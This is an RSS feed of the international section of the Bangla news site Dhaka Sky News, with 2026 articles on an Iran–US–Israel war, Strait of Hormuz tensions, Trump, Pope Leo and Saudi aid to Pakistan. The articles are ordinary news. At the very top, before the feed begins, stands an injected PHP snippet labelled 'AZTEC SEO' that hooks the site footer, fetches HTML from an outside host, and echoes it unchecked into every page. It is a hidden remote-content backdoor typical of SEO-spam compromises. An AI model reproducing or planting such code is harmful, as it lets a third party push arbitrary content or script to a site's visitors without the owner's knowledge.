/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); আন্তর্জাতিক – Dhaka Sky News https://www.dhakaskynews.com Dhaka Sky News Sat, 13 Jun 2026 03:41:59 +0000 en-US hourly 1 https://wordpress.org/?v=6.9.9 জব্দ করা ইরানি ২৪ বিলিয়ন ডলার ছাড়তে রাজি ট্রাম্প https://www.dhakaskynews.com/international/2026/06/13/News_ID-7242/ https://www.dhakaskynews.com/international/2026/06/13/News_ID-7242/#respond Sat, 13 Jun 2026 03:41:59 +0000 https://www.dhakaskynews.com/?p=7242 ইরানের জব্দকৃত ২৪ বিলিয়ন ডলারের সম্পদ ছাড়তে রাজি হয়েছেন মার্কিন প্রেসিডেন্ট ডোনাল্ড ট্রাম্প। শুক্রবার (১২ জুন) ইরানের এক জ্যেষ্ঠ কর্মকর্তার বরাতে এক প্রতিবেদনে এ তথ্য জানিয়েছে দেশটির আধা-সরকারি সংবাদ সংস্থা ফার্স।
এদিকে, শুক্রবার (১২ জুন) ইরানে অর্থ স্থানান্তরের অভিযোগসংক্রান্ত বিভিন্ন প্রতিবেদন প্রত্যাখ্যান করেছে সংযুক্ত আরব আমিরাত। এর মধ্যে ৩ বিলিয়ন ডলার ইরানে পাঠানোর অভিযোগও অন্তর্ভুক্ত ছিল।
আরব আমিরাতের পররাষ্ট্র মন্ত্রণালয় এক বিবৃতিতে জানায়, কিছু আন্তর্জাতিক গণমাধ্যমে প্রকাশিত প্রতিবেদনগুলো আমরা সম্পূর্ণভাবে প্রত্যাখ্যান করছি। সংযুক্ত আরব আমিরাত থেকে ইরানে অর্থ স্থানান্তরের যে অভিযোগ আনা হয়েছে বিশেষ করে ৩ বিলিয়ন মার্কিন ডলার সংক্রান্ত দাবি প্রত্যাখ্যান করছি।
আমিরাতের মন্ত্রণালয় অভিযোগগুলোকে সম্পূর্ণ মিথ্যা ও ভিত্তিহীন বলে আখ্যায়িত করে এবং জোর দিয়ে বলে, ইরানের কোনো জব্দ বা স্থগিত তহবিল ইউএইর মাধ্যমে মুক্ত করা, স্থানান্তর করা বা স্থানান্তরে সহায়তা করা হয়নি।
ফার্স-এর প্রতিবেদন মতে, ইরানের সর্বোচ্চ নেতার জ্যেষ্ঠ উপদেষ্টা মোহসেন রেজায়ি দক্ষিণ-পশ্চিমাঞ্চলীয় শহর দেজফুলে এক স্মরণসভায় বক্তব্য দেওয়ার সময় এ মন্তব্য করেন।
প্রতিবেদন অনুযায়ী, রেজায়ি বলেন, সাম্প্রতিক সংঘাত ইরানের আন্তর্জাতিক অবস্থানকে আরও শক্তিশালী করেছে। তার দাবি, দেশের প্রতিরোধ ও প্রতিরক্ষা সক্ষমতা এমন পর্যায়ে পৌঁছেছে যে এখন জুয়াড়ি ট্রাম্প তেহরানের সঙ্গে আলোচনায় বসতেও ভয় পাচ্ছেন।
তিনি আরও অভিযোগ করেন, মার্কিন নীতিনির্ধারণে ইসরাইলের প্রভাব ক্রমশ বেড়েছে এবং বিভিন্ন লবিং কার্যক্রমের কারণে যুক্তরাষ্ট্র কার্যত ‘জায়নিস্ট শাসনের উপনিবেশে’ পরিণত হয়েছে।
রেজায়ির এ মন্তব্যের আগে ইরানের পররাষ্ট্রমন্ত্রী আব্বাস আরাগচি শুক্রবার (১২ জুন) বলেন, যুক্তরাষ্ট্রের সঙ্গে প্রস্তাবিত সমঝোতা স্মারক স্বাক্ষরিত হলে ইরান-সংক্রান্ত সব সংঘাতের আনুষ্ঠানিক অবসান ঘটবে। এর মধ্যে লেবানন ফ্রন্টও অন্তর্ভুক্ত থাকবে। পাশাপাশি এটি নিষেধাজ্ঞা প্রত্যাহার নিয়ে আলোচনার পথও সুগম করবে।

]]>
https://www.dhakaskynews.com/international/2026/06/13/News_ID-7242/feed/ 0
ট্রাম্পের ভুয়া প্রতিশ্রুতিতে বিভ্রান্ত হয়েছে ইরান: রাশিয়ার পররাষ্ট্রমন্ত্রী https://www.dhakaskynews.com/international/2026/04/22/News_ID-7197/ https://www.dhakaskynews.com/international/2026/04/22/News_ID-7197/#respond Wed, 22 Apr 2026 13:15:30 +0000 https://www.dhakaskynews.com/?p=7197 রাশিয়ার পররাষ্ট্রমন্ত্রী সের্গেই ল্যাভরভ বলেছেন, ইরানকে মিথ্যা আশ্বাস দিয়ে (যু্ক্তরাষ্ট্রের পক্ষ থেকে) বিভ্রান্ত করা হয়েছে। তিনি অভিযোগ করেন, ইরানকে হুমকি দেওয়া হয়েছে এবং নানা প্রতিশ্রুতি দেওয়া হলেও বাস্তব কোনো বিষয় নিয়ে আলোচনা হয়নি।

ল্যাভরভের মতে বলেন, যুক্তরাষ্ট্রের প্রতিশ্রুতির ফাঁদে পড়েছে ইরান। ইরান-যুক্তরাষ্ট্র আলোচনায় নানা বক্তব্য ও অঙ্গীকার দেখা গেলেও সেগুলোর বাস্তব কোনো ভিত্তি নেই। তিনি আরও বলেন, ইরানের অবস্থান যৌক্তিক, কারণ এর আগেও তারা এমন আশ্বাসের সম্মুখীন হয়েছে।

তিনি জানান, পাকিস্তানে হতে যাওয়া ইরান ও যুক্তরাষ্ট্রের সম্ভাব্য আলোচনার অগ্রগতি পর্যবেক্ষণ করছে রাশিয়া। তার মতে, পরিস্থিতি ২৪ ঘণ্টার মধ্যেই বহুবার পরিবর্তিত হতে পারে।

পররাষ্ট্রমন্ত্রী আরও বলেন, যদি ইরান ও যুক্তরাষ্ট্র ২০১৫ সালের চুক্তির মতো কোনো সমঝোতায় পৌঁছাতে পারে, তবে তা একটি বড় সাফল্য হিসেবে বিবেচিত হবে।

তথ্য সূত্র: সামা টিভি অনলাইন

]]>
https://www.dhakaskynews.com/international/2026/04/22/News_ID-7197/feed/ 0
নীরবতা ভেঙে কঠিন যে হুঁশিয়ারি দিলেন ইরানের সর্বোচ্চ নেতা https://www.dhakaskynews.com/international/2026/04/18/News_ID-7184/ https://www.dhakaskynews.com/international/2026/04/18/News_ID-7184/#respond Sat, 18 Apr 2026 13:04:45 +0000 https://www.dhakaskynews.com/?p=7184 ইরানের সেনাবাহিনী দিবস উপলক্ষে দেওয়া এক বিশেষ বার্তায় দেশটির সর্বোচ্চ নেতা আয়াতুল্লাহ মুজতবা খামেনি কুফর ও দাম্ভিক শক্তির বিরুদ্ধে প্রতিরোধ অব্যাহত রাখার দৃঢ় অঙ্গীকার ব্যক্ত করেছেন। সামাজিক মাধ্যম টেলিগ্রামে দেওয়া ওই বার্তায় তিনি বর্তমান সংঘাতকে ইরানের বিপ্লবী ঐতিহ্যের একটি অবিচ্ছেদ্য অংশ হিসেবে চিত্রায়িত করেন।

তিনি দাবি করেন, ইরানের সেনাবাহিনী তথাকথিত দুই শত্রুপক্ষ—যুক্তরাষ্ট্র ও জায়নবাদী শক্তির দুর্বলতা ও অবমাননা বিশ্ববাসীর সামনে উন্মোচিত করেছে।

মুজতবা খামেনি তার বার্তায় ইরানি বাহিনীর সামরিক সক্ষমতার প্রশংসা করে বলেন, সেনাবাহিনীর ড্রোনগুলো আমেরিকান ও জায়নবাদী অপরাধীদের ওপর বজ্রপাতের মতো আঘাত হানছে। সেই সঙ্গে দেশটির নৌবাহিনী শত্রুদের নতুন পরাজয়ের তিক্ত স্বাদ আস্বাদন করাতে সম্পূর্ণ প্রস্তুত রয়েছে বলেও তিনি হুঁশিয়ারি উচ্চারণ করেন।

তার মতে, ১৯৭৯ সালের ইসলামি বিপ্লবের পর থেকেই এই সেনাবাহিনী জনগণের হৃদয়ের স্পন্দন ও জাতির প্রকৃত সন্তান হিসেবে নিজের যোগ্য স্থান দখল করে নিয়েছে।

বর্তমান যুদ্ধকে তিনি যুক্তরাষ্ট্র ও জায়নবাদী শাসনামল কর্তৃক ইরানের মহান জাতির ওপর ‘চাপিয়ে দেওয়া যুদ্ধ’ হিসেবে অভিহিত করেছেন। এই বার্তায় তিনি তার পূর্বসূরি এবং আততায়ীর হাতে নিহত পিতা আয়াতুল্লাহ আলী খামেনির প্রতি গভীর শ্রদ্ধা নিবেদন করেন। তিনি উল্লেখ করেন, বিপ্লবের প্রথম দশক থেকেই তার পিতা সেনাবাহিনীর সুরক্ষা ও এর সক্ষমতা বৃদ্ধিতে নিরলস প্রচেষ্টা চালিয়েছিলেন।

উল্লেখ্য, গত ফেব্রুয়ারি মাসে যুদ্ধ শুরুর প্রাক্কালে তার পিতা নিহত হওয়ার পর দায়িত্ব গ্রহণ করলেও এখন পর্যন্ত মুজতবা খামেনিকে জনসমক্ষে দেখা যায়নি। বার্তার শেষাংশে তিনি এই চলমান যুদ্ধে নিহতদের পরিবারের প্রতি গভীর সমবেদনা জানান এবং দেশের সার্বভৌমত্ব রক্ষায় সেনাবাহিনীর ভূমিকার ভূয়সী প্রশংসা করেন।

সূত্র: আলজাজিরা।

 

]]>
https://www.dhakaskynews.com/international/2026/04/18/News_ID-7184/feed/ 0
পাকিস্তানকে ৩ বিলিয়ন ডলার সহায়তা দিচ্ছে সৌদি আরব https://www.dhakaskynews.com/international/2026/04/15/News_ID-7170/ https://www.dhakaskynews.com/international/2026/04/15/News_ID-7170/#respond Wed, 15 Apr 2026 12:22:24 +0000 https://www.dhakaskynews.com/?p=7170 তীব্র অর্থনৈতিক সংকটে থাকা পাকিস্তানের জন্য বড় ধরনের স্বস্তির খবর নিয়ে এসেছে সৌদি আরব। দেশটির অর্থনীতিকে স্থিতিশীল করতে রিয়াদ নতুন করে ৩ বিলিয়ন (৩০০ কোটি) ডলারের আর্থিক সহায়তার ঘোষণা দিয়েছে।

পাকিস্তানের অর্থমন্ত্রী মুহাম্মদ আওরঙ্গজেব ওয়াশিংটনে আইএমএফ ও বিশ্বব্যাংকের বসন্তকালীন সভায় যোগ দিয়ে এই তথ্য নিশ্চিত করেছেন।

সৌদি আরবের পক্ষ থেকে দেওয়া এই ৩ বিলিয়ন ডলার সরাসরি পাকিস্তানের কেন্দ্রীয় ব্যাংকে জমা রাখা হবে, যা দেশটির বৈদেশিক মুদ্রার রিজার্ভ বাড়াতে এবং আন্তর্জাতিক পেমেন্ট মেটাতে সাহায্য করবে।

এর আগে সৌদি আরব ইতোমধ্যে পাকিস্তানের কাছে রাখা তাদের ৫ বিলিয়ন ডলারের একটি আমানত ফিরিয়ে না নিয়ে সেটির মেয়াদ বাড়িয়েছে। অর্থাৎ, এই নতুন সহায়তা মিলিয়ে পাকিস্তানের অর্থনীতিতে সৌদি আরবের মোট জমার পরিমাণ দাঁড়ালো ৮ বিলিয়ন ডলারে।

বর্তমানে পাকিস্তান বড় ধরনের আর্থিক চাপের মধ্যে রয়েছে। বিশেষ করে সংযুক্ত আরব আমিরাতকে ৩.৫ বিলিয়ন ডলার পরিশোধের বাধ্যবাধকতা এবং আন্তর্জাতিক মুদ্রা তহবিলের (আইএমএফ) লক্ষ্যমাত্রা অনুযায়ী রিজার্ভ ১৮ বিলিয়ন ডলারে উন্নীত করার চ্যালেঞ্জ রয়েছে দেশটির সামনে। এই কঠিন সময়ে সৌদি আরবের এই সময়োপযোগী সিদ্ধান্ত পাকিস্তানের জন্য একটি ‘লাইফলাইন’ হিসেবে কাজ করবে বলে মনে করা হচ্ছে।

অর্থমন্ত্রী আওরঙ্গজেব জানিয়েছেন, পাকিস্তান সরকার পরিকল্পিতভাবে অর্থনৈতিক সংস্কার কার্যক্রম চালিয়ে যাচ্ছে। ইতিমধ্যে দেশটি সফলভাবে ১.৪ বিলিয়ন ডলারের ইউরোবন্ড পরিশোধ করেছে। এছাড়া আইএমএফ-এর ঋণ কর্মসূচির আওতায় পরবর্তী কিস্তির ১.২ বিলিয়ন ডলার দ্রুতই পাওয়ার আশা করছে পাকিস্তান।

]]>
https://www.dhakaskynews.com/international/2026/04/15/News_ID-7170/feed/ 0
মধ্যপ্রাচ্যে আরও হাজার হাজার সৈন্য পাঠাচ্ছে যুক্তরাষ্ট্র https://www.dhakaskynews.com/international/2026/04/15/News_ID-7167/ https://www.dhakaskynews.com/international/2026/04/15/News_ID-7167/#respond Wed, 15 Apr 2026 12:21:09 +0000 https://www.dhakaskynews.com/?p=7167 ইরানকে একটি স্থায়ী শান্তি চুক্তিতে বাধ্য করতে মধ্যপ্রাচ্যে আরও কয়েক হাজার অতিরিক্ত সৈন্য পাঠানোর পরিকল্পনা করছে যুক্তরাষ্ট্র। ওয়াশিংটন পোস্টের এক প্রতিবেদনে দাবি করা হয়েছে, চলমান যুদ্ধ অবসানে ইরানের ওপর চাপ বাড়াতেই মার্কিন প্রশাসন এই বিশাল সামরিক সমাবেশের সিদ্ধান্ত নিয়েছে।

মার্কিন কর্মকর্তাদের বরাত দিয়ে পত্রিকাটি জানিয়েছে, প্রায় ৬ হাজার সৈন্য নিয়ে বিমানবাহী রণতরী ইউএসএস জর্জ এইচ ডব্লিউ বুশ এবং বেশ কিছু যুদ্ধজাহাজ এই অঞ্চলে অবস্থান নিতে পারে। এছাড়া চলতি মাসের শেষের দিকে আরও প্রায় ৪ হাজার ২০০ সৈন্য তাদের সাথে যোগ দেওয়ার কথা রয়েছে।

প্রতিরক্ষা বিশ্লেষকদের মতে, এই সৈন্য মোতায়েনের সময়টি অত্যন্ত তাৎপর্যপূর্ণ। আগামী ২২ এপ্রিল ইরানে দুই সপ্তাহের যুদ্ধবিরতির মেয়াদ শেষ হতে যাচ্ছে, আর ঠিক সেই সময়েই মার্কিন সামরিক শক্তি সেখানে বৃদ্ধি করা হচ্ছে। পেন্টাগন কেবল সৈন্য মোতায়েনেই সীমাবদ্ধ থাকছে না, বরং ইরানের ওপর সরাসরি সামরিক হামলা বা স্থল অভিযানের কথাও গুরুত্বের সঙ্গে বিবেচনা করছে।

এই সম্ভাব্য অভিযানের মধ্যে রয়েছে ইরানের পারমাণবিক উপাদান সরিয়ে নেওয়া, হরমুজ প্রণালি রক্ষায় উপকূলীয় অঞ্চলে মেরিন সেনা নামানো এবং ইরানের প্রধান তেল রপ্তানি কেন্দ্র হিসেবে পরিচিত খারগ দ্বীপের নিয়ন্ত্রণ নেওয়ার মতো গুরুত্বপূর্ণ সামরিক মিশন।

তবে এই পরিকল্পনার বিষয়ে মার্কিন প্রতিরক্ষা সদর দপ্তর বা পেন্টাগন এখনো আনুষ্ঠানিকভাবে কোনো মন্তব্য করেনি। এই পদক্ষেপের ফলে মধ্যপ্রাচ্যে চলমান অস্থিরতা এক নতুন এবং ভয়াবহ মোড় নিতে পারে বলে ধারণা করা হচ্ছে।

সূত্র: দ্য গার্ডিয়ান।

]]>
https://www.dhakaskynews.com/international/2026/04/15/News_ID-7167/feed/ 0
ট্রাম্পের সমালোচনার জবাবে যা বললেন পোপ লিও https://www.dhakaskynews.com/international/2026/04/13/News_ID-7154/ https://www.dhakaskynews.com/international/2026/04/13/News_ID-7154/#respond Mon, 13 Apr 2026 13:05:47 +0000 https://www.dhakaskynews.com/?p=7154 মার্কিন প্রেসিডেন্ট ডোনাল্ড ট্রাম্পের কঠোর সমালোচনার জবাবে পোপ লিও কড়া ভাষায় বলেন, আমরা কোনো রাজনীতিবিদ নই বরং আমরা শান্তিপ্রণেতা।

আলজেরিয়া সফরের উদ্দেশে বিমানে থাকা অবস্থায় সাংবাদিকদের সঙ্গে আলাপকালে তিনি বলেন, ট্রাম্প প্রশাসনের সমালোচনা বা তাদের কোনো পদক্ষেপে তিনি ভীত নন। তিনি বিশ্বাস করেন, গির্জা এবং তার প্রধান কাজ হলো কোনো ভয়ভীতি ছাড়াই পবিত্র ইঞ্জিল বা গসপেলের শান্তির বাণী বিশ্বজুড়ে ছড়িয়ে দেওয়া।

এর আগে ট্রাম্প তাকে ‘অপরাধ দমনে দুর্বল’ এবং ‘বৈদেশিক নীতিতে ভয়াবহ’ বলে আখ্যায়িত করেছিলেন। ট্রাম্পের এমন অস্বাভাবিক আক্রমণের মূল কারণ ছিল ইরান যুদ্ধের বিষয়ে পোপের সমালোচনামূলক অবস্থান। পোপ লিও সাফ জানিয়ে দিয়েছেন, একজন রাজনীতিবিদের চোখে বৈদেশিক নীতি যেমন হয়, গির্জা সেই দৃষ্টিভঙ্গি দিয়ে বিষয়গুলো বিচার করে না। তাদের লক্ষ্য রাজনৈতিক ফায়দা নয় বরং ধর্মীয় মূল্যবোধের ভিত্তিতে শান্তি প্রতিষ্ঠা করা।

পোপ আরও যোগ করেন যে, তিনি ইঞ্জিলের শান্তিকামী শিক্ষায় বিশ্বাসী এবং সেই অনুযায়ী নিজের দায়িত্ব পালন করে যাবেন। মূলত ইরান-ইসরাইল যুদ্ধের জেরে মার্কিন নীতির সমালোচনা করায় ট্রাম্পের ক্ষোভের মুখে পড়েন পোপ।

তবে পোপের এ বলিষ্ঠ অবস্থান প্রমাণ করে যে রাজনৈতিক চাপের মুখে তিনি তার শান্তির অবস্থান থেকে সরে আসতে রাজি নন। মার্কিন প্রেসিডেন্টের ব্যক্তিগত আক্রমণের পরও তিনি তার শান্তিকামী বার্তার ওপরই অটল রয়েছেন।

সূত্র: আলজাজিরা।

]]>
https://www.dhakaskynews.com/international/2026/04/13/News_ID-7154/feed/ 0
ইরান ইস্যুতে চীনকে হুঁশিয়ার করলেন ট্রাম্প https://www.dhakaskynews.com/international/2026/04/13/News_ID-7142/ https://www.dhakaskynews.com/international/2026/04/13/News_ID-7142/#respond Mon, 13 Apr 2026 13:00:33 +0000 https://www.dhakaskynews.com/?p=7142 ইসলামাবাদে আলোচনা ভেস্তে যাওয়ার পর শঙ্কা বেড়েছে মধ্যপ্রাচ্যে। ইরানকে অবরোধ করতে ইতোমধ্যে নির্দেশ দিয়েছেন মার্কিন প্রেসিডেন্ট ডোনাল্ড ট্রাম্প। তবে তেহরানের সঙ্গে বিরোধের সময়ে চীনের সঙ্গেও দ্বন্দ্বে জড়িয়ে পড়তে পারে যুক্তরাষ্ট্র।

আন্তর্জাতিক কয়েকটি মিডিয়া বলছে, চীন আগামী কয়েক সপ্তাহের মধ্যে ইরানকে নতুন আকাশ প্রতিরক্ষা ব্যবস্থা সরবরাহের প্রস্তুতি নিচ্ছে। ট্রাম্প বিষয়টি জেনেছেন এবং মিথ্যা বলে অভিযোগ করছেন। তবে তিনি চীনকে সতর্ক করে রেখেছেন। যদি তারা ভুল করে তবে কড়া ব্যবস্থা নেবেন।

ফক্স নিউজকে দেওয়া এক সাক্ষাৎকারে ট্রাম্পকে জিজ্ঞেস করা হয়, ‘যদি কোনো দেশ ইরানকে সমর্থন করে এবং সামরিক সরঞ্জাম পাঠায়, তাহলে তাদের ওপর ৫০ শতাংশ শুল্ক আরোপ করা হবে কি না এবং সেই তালিকায় চীন আছে কি না?’ জবাবে ট্রাম্প বলেন, ‘হ্যাঁ, অন্যরাও আছে, তবে চীনও আছে।’

যদিও ট্রাম্প এসব সংবাদকে ‘ভুয়া’ বলে উড়িয়ে দেন, তবে তিনি সতর্ক করে বলেন, যদি এগুলো সত্য প্রমাণিত হয়, তাহলে বেইজিংকে বড় ধরনের শুল্কের মুখে পড়তে হবে।

মার্কিন প্রেসিডেন্ট বলেছেন, সংবাদ প্রতিবেদনের ওপর আমি খুব একটা ভরসা করি না। কারণ অনেকই ভুয়া। তবে শুনছি চীন নাকি শোল্ডার মিসাইল দিচ্ছে। আমি মনে করি তারা এটা করবে না, কারণ তাদের সঙ্গে আমার সম্পর্ক আছে। হয়তো শুরুতে কিছুটা করেছে, কিন্তু এখন আর করবে বলে মনে হয় না।

তিনি আরও বলেন, কিন্তু যদি আমরা তাদের এমন কিছু করতে ধরি, তাহলে তাদের ওপর ৫০ শতাংশ শুল্ক বসবে—যা বিশাল অঙ্ক।

সিএনএনের প্রতিবেদনে বলা হয়, বেইজিং খুব শিগগিরই ইরানে কাঁধে বহনযোগ্য বিমান বিধ্বংসী ক্ষেপণাস্ত্র পাঠানোর প্রস্তুতি নিচ্ছে। প্রতিবেদনে আরও বলা হয়, চীন এসব অস্ত্র তৃতীয় কোনো দেশের মাধ্যমে পাঠানোর পরিকল্পনা করছে, যাতে প্রকৃত উৎস গোপন থাকে।

এ বিষয়ে প্রতিক্রিয়া জানতে চাইলে ট্রাম্প বলেন, চীন যদি এটা করে, তাহলে তাদের বড় সমস্যায় পড়তে হবে।’ তবে ওয়াশিংটনে চীনা দূতাবাসের এক মুখপাত্র দাবি করেছেন, ‘চীন কখনোই এই সংঘাতে কোনো পক্ষকে অস্ত্র দেয়নি। এ সংক্রান্ত তথ্য সঠিক নয়।’

]]>
https://www.dhakaskynews.com/international/2026/04/13/News_ID-7142/feed/ 0
ট্রাম্পকে পদচ্যুত করার কথা বললেন সিআইএর সাবেক পরিচালক https://www.dhakaskynews.com/international/2026/04/13/News_ID-7139/ https://www.dhakaskynews.com/international/2026/04/13/News_ID-7139/#respond Mon, 13 Apr 2026 12:58:59 +0000 https://www.dhakaskynews.com/?p=7139 মার্কিন প্রেসিডেন্ট ডোনাল্ড ট্রাম্পকে পদচ্যুত করার ক্রমবর্ধমান আহ্বানে এবার নাম লিখিয়েছেন যুক্তরাষ্ট্রের কেন্দ্রীয় গোয়েন্দা সংস্থার (সিআইএ) সাবেক পরিচালক জন ব্রেনান।

অযোগ্যতার কারণে ট্রাম্পকে পদচ্যুত করার পক্ষে যুক্তি দিয়েছেন ব্রেনান। এ প্রসঙ্গে তিনি বলেছেন, মার্কিন সংবিধানের ২৫তম সংশোধনী ট্রাম্পের কথা মাথায় রেখেই লেখা হয়েছিল।

বারাক ওবামা প্রশাসনে সিআইএর প্রধান হিসেবে দায়িত্ব পালন করেন ব্রেনান। তিনি গত শনিবার এমএস নাউকে সাক্ষাৎকার দেন।

সাক্ষাৎকারে জন ব্রেনান বলেন, ইরানি সভ্যতা ধ্বংসের বিষয়ে ট্রাম্পের সাম্প্রতিক উসকানিমূলক মন্তব্য এবং এতে বহু মানুষের জীবনের ওপর সৃষ্ট ঝুঁকি তাকে পদচ্যুত করার যৌক্তিকতা তৈরি করেছে।

ট্রাম্প সম্পর্কে ব্রেনান বলেন, ‘এই ব্যক্তি স্পষ্টতই মানসিকভাবে ভারসাম্যহীন।’

ব্রেনান আরও বলেন, ‘আমি মনে করি, ২৫তম সংশোধনী ডোনাল্ড ট্রাম্পকে মাথায় রেখেই লেখা হয়েছিল।’

ব্রেনানের মতে, ট্রাম্প এতটাই বড় ধরনের ঝুঁকি যে তাকে কমান্ডার-ইন-চিফ হিসেবে দায়িত্বে রাখা উচিত নয়। কারণ তার হাতে যুক্তরাষ্ট্রের পরমাণু অস্ত্রভান্ডারসহ বিপুল সামরিক শক্তি রয়েছে।

]]>
https://www.dhakaskynews.com/international/2026/04/13/News_ID-7139/feed/ 0
হরমুজ প্রণালিতে প্রবেশকারী বা বের হওয়া সব জাহাজ আটকানো হবে: ট্রাম্প https://www.dhakaskynews.com/international/2026/04/12/News_ID-7125/ https://www.dhakaskynews.com/international/2026/04/12/News_ID-7125/#respond Sun, 12 Apr 2026 13:26:40 +0000 https://www.dhakaskynews.com/?p=7125  

ইসলামাবাদে ইরান ও যুক্তরাষ্ট্রের মধ্যে অনুষ্ঠিত আলোচনা কোনো চুক্তি ছাড়াই ব্যর্থ হওয়ার কয়েক ঘণ্টার মাথায় এক কঠোর হুঁশিয়ারি উচ্চারণ করেছেন মার্কিন প্রেসিডেন্ট ডোনাল্ড ট্রাম্প। নিজের সামাজিক যোগাযোগমাধ্যম ‘ট্রুথ সোশ্যাল’-এ দেওয়া এক বার্তায় তিনি ঘোষণা করেছেন, মার্কিন বাহিনী অবিলম্বে হরমুজ প্রণালিতে প্রবেশকারী বা সেখান থেকে বের হওয়া সমস্ত জাহাজ ‘অবরোধ’ করার প্রক্রিয়া শুরু করবে।

ট্রাম্প তার পোস্টে উল্লেখ করেন, এক সময় এমন পরিস্থিতি আসবে যখন সব জাহাজ অবাধে যাতায়াত করতে পারবে, কিন্তু ইরানের অনমনীয়তার কারণে এখনই তা সম্ভব হচ্ছে না। তিনি আরও জানান যে আন্তর্জাতিক জলসীমায় যেসব জাহাজ ইরানকে টোল বা মাশুল প্রদান করেছে, সেগুলোকে খুঁজে বের করতে এবং বাধা দিতে তিনি মার্কিন নৌবাহিনীকে নির্দেশ দিয়েছেন।

ট্রাম্পের মতে, যারা ইরানকে ‘অবৈধ টোল’ দেবে, মুক্ত সমুদ্রে তাদের কোনো নিরাপদ চলাচলের নিশ্চয়তা থাকবে না। এই কঠোর পদক্ষেপের ঘোষণা মধ্যপ্রাচ্যের এই গুরুত্বপূর্ণ নৌপথে নতুন করে চরম উত্তেজনার সৃষ্টি করেছে।

সূত্র: আলজাজিরা।

]]>
https://www.dhakaskynews.com/international/2026/04/12/News_ID-7125/feed/ 0
ইরানের বৃহত্তম পেট্রোকেমিক্যাল কেন্দ্রে ইসরাইলের ভয়াবহ হামলা https://www.dhakaskynews.com/international/2026/04/06/News_ID-6901/ https://www.dhakaskynews.com/international/2026/04/06/News_ID-6901/#respond Mon, 06 Apr 2026 12:51:46 +0000 https://www.dhakaskynews.com/?p=6901 মধ্যপ্রাচ্যের সংঘাত এক নতুন ও বিধ্বংসী মোড় নিয়েছে। পারস্য উপসাগরের তলদেশে অবস্থিত বিশ্বের বৃহত্তম গ্যাসক্ষেত্র সাউথ পারসের একটি প্রধান পেট্রোকেমিক্যাল কেন্দ্রে ভয়াবহ বিমান হামলা চালিয়েছে ইসরাইল।

ইসরাইলি প্রতিরক্ষা মন্ত্রী ইসরাইল কাটজ এই হামলার সত্যতা নিশ্চিত করে জানিয়েছেন, ইরানের মোট পেট্রোকেমিক্যাল উৎপাদনের অর্ধেক জোগান দেওয়া এই বৃহত্তম স্থাপনাটিতে অত্যন্ত শক্তিশালী আঘাত হানা হয়েছে। এই হামলার ফলে ওই অঞ্চলে আলোচনার মাধ্যমে যুদ্ধবিরতির যে ক্ষীণ সম্ভাবনা তৈরি হয়েছিল, তা এখন চরম অনিশ্চয়তার মুখে পড়েছে।

হামলার ভয়াবহতা কেবল অবকাঠামো ধ্বংসেই সীমাবদ্ধ থাকেনি। ইরানি রাষ্ট্রীয় সংবাদমাধ্যম ও ইসরাইলি প্রতিরক্ষা মন্ত্রণালয় জানায়, তেহরানে চালানো পৃথক হামলায় বিপ্লবী গার্ড বাহিনীর (আইআরজিসি) গোয়েন্দা প্রধান মেজর জেনারেল মজিদ খাদেমি নিহত হয়েছেন। এছাড়া কুদস ফোর্সের আন্ডারকভার ইউনিটের প্রধান আসগর বাকেরিকেও হত্যার দাবি করেছে ইসরাইলি সামরিক বাহিনী।

রাজধানী তেহরানের শরিফ ইউনিভার্সিটি অব টেকনোলজি সংলগ্ন এলাকায় বিমান হামলার পর আজাদি স্কয়ারের ওপর দিয়ে কালো ধোঁয়ার কুণ্ডলী উড়তে দেখা গেছে এবং ঘণ্টার পর ঘণ্টা সেখানে যুদ্ধবিমানের গর্জন শোনা গেছে।

ইসরাইলের এই আগ্রাসনের জবাবে ইরানও পাল্টা আঘাত হেনেছে। উত্তর ইসরাইলের হাইফা শহরে ইরানি ক্ষেপণাস্ত্রের আঘাতে একটি আবাসিক ভবন ধসে অন্তত চারজন নিহত হয়েছেন। পরিস্থিতির অবনতি দেখে সৌদি আরব, সংযুক্ত আরব আমিরাত ও কুয়েত তাদের আকাশ প্রতিরক্ষা ব্যবস্থা সক্রিয় করেছে এবং ইরানের ছোড়া বেশ কিছু ড্রোন ও ক্ষেপণাস্ত্র রুখে দিয়েছে। হরমুজ প্রণালিতে ইরানের কঠোর নিয়ন্ত্রণ এবং আঞ্চলিক জ্বালানি স্থাপনায় নিয়মিত হামলার কারণে বিশ্ববাজারে তেলের দাম আকাশচুম্বী হয়ে উঠেছে।

এদিকে, হোয়াইট হাউস এই হামলার বিষয়ে তাৎক্ষণিক কোনো মন্তব্য না করলেও পরিস্থিতি সামাল দিতে মধ্যস্থতাকারীরা দৌড়ঝাঁপ শুরু করেছেন। বিশেষ করে মার্কিন প্রেসিডেন্ট ডোনাল্ড ট্রাম্পের পক্ষ থেকে হরমুজ প্রণালি খুলে দেওয়ার জন্য তেহরানকে দেওয়া সময়সীমা ঘনিয়ে আসায় উত্তেজনা এখন তুঙ্গে।

এর আগে ট্রাম্প সতর্ক করেছিলেন যে ইরান যদি জ্বালানি স্থাপনায় হামলা অব্যাহত রাখে, তবে যুক্তরাষ্ট্র পুরো গ্যাসক্ষেত্রটি ‘বিস্ফোরিত করে উড়িয়ে দেবে’। সব মিলিয়ে এই পাল্টাপাল্টি হামলা কেবল ইরান বা ইসরায়েল নয়, বরং বৈশ্বিক জ্বালানি নিরাপত্তা ও অর্থনীতির জন্য এক ভয়াবহ অশনিসংকেত হয়ে দাঁড়িয়েছে।

সূত্র: দ্য গার্ডিয়ান।

]]>
https://www.dhakaskynews.com/international/2026/04/06/News_ID-6901/feed/ 0